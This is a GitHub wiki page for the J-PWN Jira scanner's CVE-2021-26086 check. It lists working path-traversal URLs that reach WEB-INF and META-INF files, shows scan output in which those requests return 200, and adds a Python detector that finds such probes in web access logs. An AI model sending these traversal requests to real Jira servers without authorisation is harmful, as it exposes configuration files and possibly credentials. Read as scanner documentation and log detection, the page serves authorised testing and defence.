CVE‐2021‐26086 - carnal0wnage/J-PWN GitHub Wiki
CVE-2021-26086
Category: [Information Disclosure]
module name: check_cve_2021_26086
urls:
/s/cfx/_/;/WEB-INF/web.xml
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx/_/;/WEB-INF/decorators.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
[CG] This one differs from the other similar path traversals in that you can get to the /WEB-INF/ folder, which might actually have creds in it.
It also attempts to validate that the files contain sensitive data:
    # Flag the response only when it is a 200 and the body contains an expected XML marker
    if response.status_code == 200 and any(keyword in chunk for keyword in ["dependency", "web-app", "filter", "filter-mapping"]):
        contains_sensitive_data = True
Example true positive that is not vulnerable to CVE-2020-29453 (same host):
INFO: Checking for CVE-2020-29453
[Testing URL]: https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- HTTP Status Code: 404
- No vulnerability detected at https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
[Testing URL]: https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
- HTTP Status Code: 404
- No vulnerability detected at https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
[Testing URL]: https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/web.xml
- HTTP Status Code: 404
- No vulnerability detected at https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/web.xml
[Testing URL]: https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/classes/seraph-config.xml
- HTTP Status Code: 404
- No vulnerability detected at https://JIRASERVER/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/classes/seraph-config.xml
INFO: Checking for CVE-2021-26086
[Testing URL]: https://JIRASERVER/s/cfx/_/;/WEB-INF/web.xml
- HTTP Status Code: 200
[Testing URL]: https://JIRASERVER/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
- HTTP Status Code: 200
[Testing URL]: https://JIRASERVER/s/cfx/_/;/WEB-INF/decorators.xml
- HTTP Status Code: 200
[Testing URL]: https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
- HTTP Status Code: 200
- NEEDS MANUAL REVIEW - No sensitive information detected at https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
[Testing URL]: https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
- HTTP Status Code: 200
[Testing URL]: https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- HTTP Status Code: 200
[Testing URL]: https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
- HTTP Status Code: 200
- NEEDS MANUAL REVIEW - No sensitive information detected at https://JIRASERVER/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
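The request paths in the output above leave a recognizable pattern in web server access logs. The following is an added example, not part of J-PWN or the original page: it scans access log lines for requests under /s/<token>/_/ that reach WEB-INF or META-INF (covering both the ";" and "%2e" forms shown above) and reports which ones were answered with a 200. It assumes combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not taken from a real host).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2025:10:00:01 +0000] "GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1" 200 48211 "-" "python-requests/2.31"
203.0.113.7 - - [10/Jan/2025:10:00:02 +0000] "GET /s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/web.xml HTTP/1.1" 404 512 "-" "python-requests/2.31"
198.51.100.4 - - [10/Jan/2025:10:00:03 +0000] "GET /s/d41d8cd9/_/images/icons/favicon.png HTTP/1.1" 200 1150 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2025:10:00:04 +0000] "GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 200 131 "-" "python-requests/2.31"
198.51.100.4 - - [10/Jan/2025:10:00:05 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

# Captures client address, request path and status code from one log line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# /s/<anything>/_/ followed by any segments (";", ".", ...) ending in WEB-INF or META-INF.
PROBE = re.compile(r'^/s/[^/]+/_/(?:[^/]+/)*?((?:WEB|META)-INF/.+)$', re.IGNORECASE)


def find_probes(log_text):
    """Return (client, target_file, status, served) for each matching request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, raw_path, status = m.group(1), m.group(2), int(m.group(3))
        # Drop the query string and percent-decode once so "%2e" is seen as ".".
        path = unquote(raw_path.split("?", 1)[0])
        probe = PROBE.match(path)
        if probe:
            hits.append((client, probe.group(1), status, status == 200))
    return hits


def served_files(log_text):
    """Protected files that were answered with a 200 and need content review."""
    return sorted({target for _, target, _, served in find_probes(log_text) if served})


if __name__ == "__main__":
    for client, target, status, served in find_probes(SAMPLE_LOG):
        print(f"{'SERVED ' if served else 'blocked'} {status} {client} {target}")
```

A 200 only shows that something was returned for the path; as the NEEDS MANUAL REVIEW lines above indicate, the response body still has to be checked.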